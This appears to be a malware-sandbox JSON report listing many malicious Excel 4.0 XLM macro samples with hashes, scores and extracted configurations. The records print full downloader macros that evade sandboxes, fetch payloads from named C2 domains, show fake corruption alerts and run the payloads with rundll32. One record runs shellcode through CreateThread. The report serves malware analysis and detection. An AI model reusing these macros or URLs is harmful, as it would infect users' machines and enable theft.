{"version":"0.2","sample":{"sample":"","kind":"file","target":"1c97a9034a1fe03b7630298837ca4963f5020a8b91024dacf2beddf39ca44a88"},"analysis":{"reported":"2020-04-09T16:15:10Z","score":10},"files":[{"filename":"1c97a9034a1fe03b7630298837ca4963f5020a8b91024dacf2beddf39ca44a88","filesize":160768,"md5":"534cf9a30c291eb777029277ca1edc73","sha1":"ff5f5337f8c756b593cb3191cec7664889e4d085","sha256":"1c97a9034a1fe03b7630298837ca4963f5020a8b91024dacf2beddf39ca44a88","sha512":"19650ae1b038fddeedeaedf5b8e1e204aafe5ca7891ecd32e2818efb85f7aa11729d9b9a29daceb8166f380809633019e518583c17514daf2105d841158d38a1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1c97a9034a1fe03b7630298837ca4963f5020a8b91024dacf2beddf39ca44a88.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"4EZ0JaSKRU\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1c97ae0aa4ff4945d47fb887c72f3b03dc15862c07424ed4561d49aece0db36e"},"analysis":{"reported":"2020-04-09T16:15:10Z","score":10},"files":[{"filename":"1c97ae0aa4ff4945d47fb887c72f3b03dc15862c07424ed4561d49aece0db36e","filesize":167936,"md5":"4932249db37f173b0f73f88e8f8cafde","sha1":"764ed094475bd832429abbde89568671bec9c02c","sha256":"1c97ae0aa4ff4945d47fb887c72f3b03dc15862c07424ed4561d49aece0db36e","sha512":"a6306ffc9780e1f34062c1595ff183c66477108ad44589c130d1156446055167a2fe6ad6538a821936d09c234bcfa32288fd4062a72f607da07d487c40e80322","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1c97ae0aa4ff4945d47fb887c72f3b03dc15862c07424ed4561d49aece0db36e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"oH3VeCUpu3\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1cc388950962fc39a9d2d26379de1b638d8fbee9f354275a4138e953ca537a7f"},"analysis":{"reported":"2020-04-09T16:15:10Z","score":10},"files":[{"filename":"1cc388950962fc39a9d2d26379de1b638d8fbee9f354275a4138e953ca537a7f","filesize":152576,"md5":"d4a0c8aa244c50d7acc65729f7fc3ef4","sha1":"561a71defd4025847416d96c7487559fef1c2b91","sha256":"1cc388950962fc39a9d2d26379de1b638d8fbee9f354275a4138e953ca537a7f","sha512":"8a9b7e6926ce531c8807d986ae577ad1e936652eba1bac5fb058833f34bfd09e1ac7ffb63c6e190bf4c1968f1b6d56839a764b96d6183313b7a258151bc5bd24","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1cc388950962fc39a9d2d26379de1b638d8fbee9f354275a4138e953ca537a7f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"jb0xbH4uSr\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1cc8df65e18543e7a7be09658f6eed626b38c48f1d1d1a201993eaef5e712be9"},"analysis":{"reported":"2020-04-09T16:15:10Z","score":10},"files":[{"filename":"1cc8df65e18543e7a7be09658f6eed626b38c48f1d1d1a201993eaef5e712be9","filesize":209920,"md5":"3f6c5138c1a983804e24143a2f3b9fa3","sha1":"68a517952144ea9c6982c378347bbec4e492da1b","sha256":"1cc8df65e18543e7a7be09658f6eed626b38c48f1d1d1a201993eaef5e712be9","sha512":"115fa6238f717b7996e6a0acfc531400346c6dcf7dc1021d25fa71a53684dd2e68f6a07a11c0fb23bf3ed0efd497c50e39e379c669cc77da1c67dd4586e998fa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1cc8df65e18543e7a7be09658f6eed626b38c48f1d1d1a201993eaef5e712be9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"P7YjBcZJQq\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1cf2a518df471195ac9a7f9c4c8894e94b4d82cc427ea6589b39dd2cbcc1e004"},"analysis":{"reported":"2020-04-09T16:15:10Z","score":10},"files":[{"filename":"1cf2a518df471195ac9a7f9c4c8894e94b4d82cc427ea6589b39dd2cbcc1e004","filesize":185344,"md5":"0da696f4fd85ca1b28b58b7854dc6e11","sha1":"0f53c352b222f118503d816c4a309c8c1fcb5ae2","sha256":"1cf2a518df471195ac9a7f9c4c8894e94b4d82cc427ea6589b39dd2cbcc1e004","sha512":"5d041a08768e72a1d6669e0b4381f78747895fba8180bee20382ed8371a7ce0fe93fbd541caa7ca1abac75108f7f627d031bbeaa60417c8aa297e12d9f2c6bea","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1cf2a518df471195ac9a7f9c4c8894e94b4d82cc427ea6589b39dd2cbcc1e004.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1cf4dfb8f448e60c0b8c5b638f2b6c8bba7479bf0edd91ee37608caf214e3663"},"analysis":{"reported":"2020-04-09T16:15:10Z","score":10},"files":[{"filename":"1cf4dfb8f448e60c0b8c5b638f2b6c8bba7479bf0edd91ee37608caf214e3663","filesize":167936,"md5":"fa6f5e60b3879a36a6346c30df7026be","sha1":"f2dca5372e6bccf5b7b50aa9018a758dd1f4960a","sha256":"1cf4dfb8f448e60c0b8c5b638f2b6c8bba7479bf0edd91ee37608caf214e3663","sha512":"9dd820b0afa52f588c39ade57913759fb5e0e70f3a5a5190d924d5359a453214a08b5c96c1c266e9bf4c00ebc52b801e7ed3c3f81ddf09f58d4de63f55470dfd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1cf4dfb8f448e60c0b8c5b638f2b6c8bba7479bf0edd91ee37608caf214e3663.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"NPb4uwiaAG\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1d154e10524d92038248916e847c9cd0e1db5bfaccdef210844126ac1ee57795"},"analysis":{"reported":"2020-04-09T16:15:10Z","score":10},"files":[{"filename":"1d154e10524d92038248916e847c9cd0e1db5bfaccdef210844126ac1ee57795","filesize":167936,"md5":"441106cc167250aa8388ae90635fbdf2","sha1":"8e48c1733963021644ead2ccec6f93de4609ed6e","sha256":"1d154e10524d92038248916e847c9cd0e1db5bfaccdef210844126ac1ee57795","sha512":"b76d61db0ad46da7ebdc24f413d9cd9c8b7ce5338615032edee1c85ca7afca45019ac96f02724738fa5c666e9232c5a8fb9b0928f30d8e2d45b6694c52693eb0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1d154e10524d92038248916e847c9cd0e1db5bfaccdef210844126ac1ee57795.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"SNaldQeM8z\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1d2c5924bcddebb5547c8547f5cb0c8fcb272bfd4c0ea4199387e01c52c47c06"},"analysis":{"reported":"2020-04-09T16:15:11Z","score":10},"files":[{"filename":"1d2c5924bcddebb5547c8547f5cb0c8fcb272bfd4c0ea4199387e01c52c47c06","filesize":185344,"md5":"b2a1379d6941ba313502ddba9958235b","sha1":"ca6f866a38a0d13b2428a27f612abe869f0c09b2","sha256":"1d2c5924bcddebb5547c8547f5cb0c8fcb272bfd4c0ea4199387e01c52c47c06","sha512":"0a7cb60a5d1b1cc0d585eab141dc51a45bb322761c796ebeb7c0f216906e96f39f555b50bb805d391fe8e639db5615dcaef294dab3d4ffb396312891d023fb12","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1d2c5924bcddebb5547c8547f5cb0c8fcb272bfd4c0ea4199387e01c52c47c06.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1d34f47d20290c11cc7f4d020f9136a68a7ae6f28f06ce505345650c70b30010"},"analysis":{"reported":"2020-04-09T16:15:11Z","score":10},"files":[{"filename":"1d34f47d20290c11cc7f4d020f9136a68a7ae6f28f06ce505345650c70b30010","filesize":206336,"md5":"2e374160b472912f57f2f28247e33ae5","sha1":"61673001362a25b698f61c9418bcbed9b20b99dc","sha256":"1d34f47d20290c11cc7f4d020f9136a68a7ae6f28f06ce505345650c70b30010","sha512":"54cc2715c62b0f20de75d4c9c3181af50a7b86b7d523f7dc2e22645d217aa0b2316fdb3e1c4c5dbbcbfa440702bbfecd2ec20a0945559d818f4a709b59974bfe","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1d34f47d20290c11cc7f4d020f9136a68a7ae6f28f06ce505345650c70b30010.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"OQpLLMjKOo\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1d48a42a0b06a087e966b860c8f293a9bf57da8d70f5f83c61242afc5b81eb4f"},"analysis":{"reported":"2020-04-09T16:15:11Z","score":10},"files":[{"filename":"1d48a42a0b06a087e966b860c8f293a9bf57da8d70f5f83c61242afc5b81eb4f","filesize":110080,"md5":"61099689fa40da9b719a9e13589116cd","sha1":"ae2e898228467fa1f90e4e4c88e475b37f8c2113","sha256":"1d48a42a0b06a087e966b860c8f293a9bf57da8d70f5f83c61242afc5b81eb4f","sha512":"3e201b1ee96b390ad239635e9d334381d59db55b3b410e654ff337d4def19cffbc2f684601637d6658daab67309f55cb848a809037d5a85fb7ec45a94fa6a87e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1d48a42a0b06a087e966b860c8f293a9bf57da8d70f5f83c61242afc5b81eb4f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"User Defined Function(\"Úл\u001fy\u001cƒÙt$ô_3ɱpƒÇ\u00041\")\nSELECT(,\"R[1]C\")\nCALL(\"Kernel32\",\"CreateThread\",\"JJJJJJJ\",0,0,R$1C$0,0,0,0)\nHALT()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1d5118a8f198384e88cf9ed974d677b1ce42344349aba7784ecd8543d78e4a3a"},"analysis":{"reported":"2020-04-09T16:15:11Z","score":10},"files":[{"filename":"1d5118a8f198384e88cf9ed974d677b1ce42344349aba7784ecd8543d78e4a3a","filesize":206336,"md5":"fe87a7ff293c0df9d723cb0cdd8d09b7","sha1":"5d701e3823e6fc095da6d933a0f01741760da2d2","sha256":"1d5118a8f198384e88cf9ed974d677b1ce42344349aba7784ecd8543d78e4a3a","sha512":"2071e6658438930d666ca4b2fabfad4ef1f1adb7ff5e8661c2d9232d8513f218560825dff4a18df83472b5401461eb553ac24b1cb28413bb8239e51b539c7f89","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1d5118a8f198384e88cf9ed974d677b1ce42344349aba7784ecd8543d78e4a3a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"WAr0yPGetF\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1d5f7ec956d0d946079177f69f784ab4a699a84e3baffee8d9f1208de9855849"},"analysis":{"reported":"2020-04-09T16:15:12Z","score":10},"files":[{"filename":"1d5f7ec956d0d946079177f69f784ab4a699a84e3baffee8d9f1208de9855849","filesize":116224,"md5":"7d0638078fe7b546467025bd92893c05","sha1":"af52f231ba9b2621e12f304679caa41a790a84a6","sha256":"1d5f7ec956d0d946079177f69f784ab4a699a84e3baffee8d9f1208de9855849","sha512":"23db44b9152560b96ed1257b08f42fb08245ce1aba4d0e2fced599a0c41c01727e1937aaddb1e0473ff7d0f872edb117ab794a65a6305bbd347d2a16c293e6d6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1d5f7ec956d0d946079177f69f784ab4a699a84e3baffee8d9f1208de9855849.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"357Kf2Bvsr\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1d6320e3cf0be4142627d01a42d7f5998aa3ecc38ee7da8a98672434d28d508b"},"analysis":{"reported":"2020-04-09T16:15:12Z","score":10},"files":[{"filename":"1d6320e3cf0be4142627d01a42d7f5998aa3ecc38ee7da8a98672434d28d508b","filesize":88576,"md5":"44fe8b72e58dcba61e8b03b58432a7bc","sha1":"0e4e10e83343f2af8e2f5d57990269a3481a91a8","sha256":"1d6320e3cf0be4142627d01a42d7f5998aa3ecc38ee7da8a98672434d28d508b","sha512":"2638eb8d739f101a556a9d7ec477a52e1b0e7b95ddad078984636320d7f5bac93619a10fffa4752f2e49e6f24671f682c033d0c9e6ca96903208488a99ecf4dc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1d6320e3cf0be4142627d01a42d7f5998aa3ecc38ee7da8a98672434d28d508b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"SUM(1375,999,R$11C$2)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1d7f369c855dd04c4671c3a999a9008cb39266a7bd011da776c08632b1ad0965"},"analysis":{"reported":"2020-04-09T16:15:12Z","score":10},"files":[{"filename":"1d7f369c855dd04c4671c3a999a9008cb39266a7bd011da776c08632b1ad0965","filesize":185344,"md5":"c8337b87b1aa937a87a65d233484d50b","sha1":"8724adf26205c9918e9810ef25842032ad05a9c5","sha256":"1d7f369c855dd04c4671c3a999a9008cb39266a7bd011da776c08632b1ad0965","sha512":"70bfbd9df22fafd42a0e244c4335e7d968fb296fbdface8a7682293f0cdaad71ca51e6a8ae438ed489f20f2a3fccdcca246689b7cec8a698f1a58946849f7e4a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1d7f369c855dd04c4671c3a999a9008cb39266a7bd011da776c08632b1ad0965.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1d825daf7f6bf7b939602d7171e151a3e43a20d8b9dff7f5b8818fa2e9e56beb"},"analysis":{"reported":"2020-04-09T16:15:12Z","score":10},"files":[{"filename":"1d825daf7f6bf7b939602d7171e151a3e43a20d8b9dff7f5b8818fa2e9e56beb","filesize":185344,"md5":"c93657b9755a27a6f24f62544427ab96","sha1":"5e39ebfa41eb4d6a0b5cf570090e8e54c1a75b0a","sha256":"1d825daf7f6bf7b939602d7171e151a3e43a20d8b9dff7f5b8818fa2e9e56beb","sha512":"a644d520da9825dfc5f4f842e457542f670d09395938aced55332f64b3f48243c43e400f22d0b6ca049dd71f16e4e7acd88155092e53a7d7d84aa02d10bd8136","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1d825daf7f6bf7b939602d7171e151a3e43a20d8b9dff7f5b8818fa2e9e56beb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1d857192ef40e03f6351c916b624a90f544b47049aa6a194c9108a9ccad082d7"},"analysis":{"reported":"2020-04-09T16:15:12Z","score":10},"files":[{"filename":"1d857192ef40e03f6351c916b624a90f544b47049aa6a194c9108a9ccad082d7","filesize":112640,"md5":"78a6634aa0007768f7830c406ef9be13","sha1":"8b989e4fe904c0b8b34fadfce495e91a3830637e","sha256":"1d857192ef40e03f6351c916b624a90f544b47049aa6a194c9108a9ccad082d7","sha512":"975ead2492b26eb94c56d8b56737706b09dbe05124a0394a5d64479611d851090e421625a8c8ece6b0897ea8b28029c08cdf54060ec4c612da74c25d7d1a5599","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1d857192ef40e03f6351c916b624a90f544b47049aa6a194c9108a9ccad082d7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1d91189aa12e120caf531919f3322611e7ac0d70724979ab2723e6b1df63fde4"},"analysis":{"reported":"2020-04-09T16:15:12Z","score":10},"files":[{"filename":"1d91189aa12e120caf531919f3322611e7ac0d70724979ab2723e6b1df63fde4","filesize":167424,"md5":"8aabb5546a7500a41bfcb3e87dc8cf79","sha1":"9d28d542a608b6ca913ea3d1369f9dcc49b4e567","sha256":"1d91189aa12e120caf531919f3322611e7ac0d70724979ab2723e6b1df63fde4","sha512":"0a4984eddcece57bb7e069ddea5cbca4733a3969c25b928a92d2c9670977d2f2eef2b2cfa08754f3a6ca9af3ac9ebf229d39da0cd4c65ba185d8a44076e7db63","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1d91189aa12e120caf531919f3322611e7ac0d70724979ab2723e6b1df63fde4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM 